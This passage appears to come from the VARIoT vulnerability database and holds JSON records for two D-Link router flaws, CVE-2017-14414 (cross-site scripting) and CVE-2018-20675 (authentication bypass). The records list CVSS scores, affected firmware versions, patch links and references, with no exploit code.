                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-14414"
      }
    ]
  },
  "cve": "CVE-2017-14414",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": true,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 4.3,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2017-14414",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "CNVD-2017-31795",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 4.3,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "VHN-105134",
            "impactScore": 2.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "exploitabilityScore": 2.8,
            "impactScore": 2.7,
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 6.1,
            "baseSeverity": "Medium",
            "confidentialityImpact": "Low",
            "exploitabilityScore": null,
            "id": "CVE-2017-14414",
            "impactScore": null,
            "integrityImpact": "Low",
            "privilegesRequired": "None",
            "scope": "Changed",
            "trust": 0.8,
            "userInteraction": "Required",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2017-14414",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-31795",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201709-581",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULHUB",
            "id": "VHN-105134",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31795"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105134"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008095"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14414"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-581"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) devices have XSS in the action parameter to htdocs/web/shareport.php. The D-Link DIR-850L device firmware contains a cross-site scripting vulnerability. Information may be obtained and information may be altered. D-Link DIR-850L REV.A is a wireless router from D-Link. A remote attacker could exploit the vulnerability to steal authentication cookies by sending an ‘action’ parameter to the htdocs/web/wandetect.php file",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-14414"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008095"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-31795"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105134"
      }
    ],
    "trust": 2.25
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-14414",
        "trust": 3.1
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008095",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-31795",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-581",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-105134",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31795"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105134"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008095"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14414"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-581"
      }
    ]
  },
  "id": "VAR-201709-0585",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31795"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105134"
      }
    ],
    "trust": 1.7
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "IoT",
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31795"
      }
    ]
  },
  "last_update_date": "2023-12-18T12:51:04.569000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "DIR-850L",
        "trust": 0.8,
        "url": "http://support.dlink.com/productinfo.aspx?m=dir-850l"
      },
      {
        "title": "D-Link DIR-850L REV.A Fixes for cross-site scripting vulnerabilities",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=235006"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008095"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-581"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-79",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-105134"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008095"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14414"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "https://pierrekim.github.io/blog/2017-09-08-dlink-850l-mydlink-cloud-0days-vulnerabilities.html"
      },
      {
        "trust": 1.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-14414"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14414"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31795"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105134"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008095"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14414"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-581"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31795"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105134"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008095"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14414"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-581"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-10-27T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-31795"
      },
      {
        "date": "2017-09-13T00:00:00",
        "db": "VULHUB",
        "id": "VHN-105134"
      },
      {
        "date": "2017-10-10T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-008095"
      },
      {
        "date": "2017-09-13T17:29:00.243000",
        "db": "NVD",
        "id": "CVE-2017-14414"
      },
      {
        "date": "2017-09-18T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201709-581"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-10-27T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-31795"
      },
      {
        "date": "2017-09-20T00:00:00",
        "db": "VULHUB",
        "id": "VHN-105134"
      },
      {
        "date": "2017-10-10T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-008095"
      },
      {
        "date": "2023-11-08T20:21:11.427000",
        "db": "NVD",
        "id": "CVE-2017-14414"
      },
      {
        "date": "2023-04-27T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201709-581"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-581"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link DIR-850L Cross-site scripting vulnerability in device firmware",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008095"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "XSS",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-581"
      }
    ],
    "trust": 0.6
  }
}

VAR-201901-1555

Vulnerability from variot - Updated: 2023-12-18 12:50

Multiple D-Link products have an authentication vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). D-Link DIR-822 C1, etc. are all wireless router products of D-Link. A security vulnerability exists in several D-Link products. An attacker could exploit this vulnerability to bypass authentication. The following products and versions are affected: D-Link DIR-822 C1 with firmware prior to v3.11B01Beta; DIR-822-US C1 with firmware prior to v3.11B01Beta; DIR-850L A* with firmware prior to v2.22B03Beta; DIR-880L A* with firmware prior to v1.20B02Beta; DIR-850L B* with firmware prior to v2.22B03Beta


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201901-1555",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "2.22b02"
      },
      {
        "model": "dir-822-us",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.10b06"
      },
      {
        "model": "dir-880l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.20b01"
      },
      {
        "model": "dir-880l",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.07.b08"
      },
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.21b07"
      },
      {
        "model": "dir-822",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.10b06"
      },
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "2.21b01"
      },
      {
        "model": "dir-822",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "3.11b01beta"
      },
      {
        "model": "dir-822-us",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "3.11b01beta"
      },
      {
        "model": "dir-850l",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.21b08beta"
      },
      {
        "model": "dir-850l",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "2.22b03beta"
      },
      {
        "model": "dir-880l",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.20b02beta"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-013973"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-20675"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-822_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "3.10b06",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-822:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-822-us_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "3.10b06",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-822-us:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.21b07",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "2.21b01",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:2.22b02:beta:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-880l_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "1.07.b08",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-880l_firmware:1.20b01:beta:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-880l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2018-20675"
      }
    ]
  },
  "cve": "CVE-2018-20675",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 7.5,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2018-20675",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "VHN-131505",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 9.8,
            "baseSeverity": "Critical",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2018-20675",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2018-20675",
            "trust": 1.8,
            "value": "CRITICAL"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201901-138",
            "trust": 0.6,
            "value": "CRITICAL"
          },
          {
            "author": "VULHUB",
            "id": "VHN-131505",
            "trust": 0.1,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2018-20675",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-131505"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-20675"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-013973"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-20675"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201901-138"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Multiple D-Link products have authentication vulnerabilities. Information may be obtained or altered, and service operation may be disrupted (DoS). The D-Link DIR-822 C1 and the other affected models are all D-Link wireless routers. A security vulnerability exists in several D-Link products. An attacker could exploit this vulnerability to bypass authentication. The following products and versions are affected: D-Link DIR-822 C1 with firmware prior to v3.11B01Beta; DIR-822-US C1 with firmware prior to v3.11B01Beta; DIR-850L A* with firmware prior to v2.22B03Beta; DIR-880L A* with firmware prior to v1.20B02Beta; DIR-850L B* with firmware prior to v2.22B03Beta",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-013973"
      },
      {
        "db": "VULHUB",
        "id": "VHN-131505"
      }
    ],
    "trust": 0.81
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2018-20675",
        "trust": 2.6
      },
      {
        "db": "DLINK",
        "id": "SAP10101",
        "trust": 1.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-013973",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201901-138",
        "trust": 0.7
      },
      {
        "db": "VULHUB",
        "id": "VHN-131505",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-20675",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-131505"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-20675"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-013973"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-20675"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201901-138"
      }
    ]
  },
  "id": "VAR-201901-1555",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-131505"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2023-12-18T12:50:26.616000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "DIR-850L Rev. Ax/Bx, DIR-880L Rev.Ax, DIR-822 Rev. Cx :: Authenticated Command Bypass \u0026 Authenticated Remote Command Execution (RCE)",
        "trust": 0.8,
        "url": "https://securityadvisories.dlink.com/announcement/publication.aspx?name=sap10101"
      },
      {
        "title": "Multiple D-Link Product security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=88326"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-013973"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201901-138"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-287",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-131505"
      },
      {
        "db": "JVNDB",
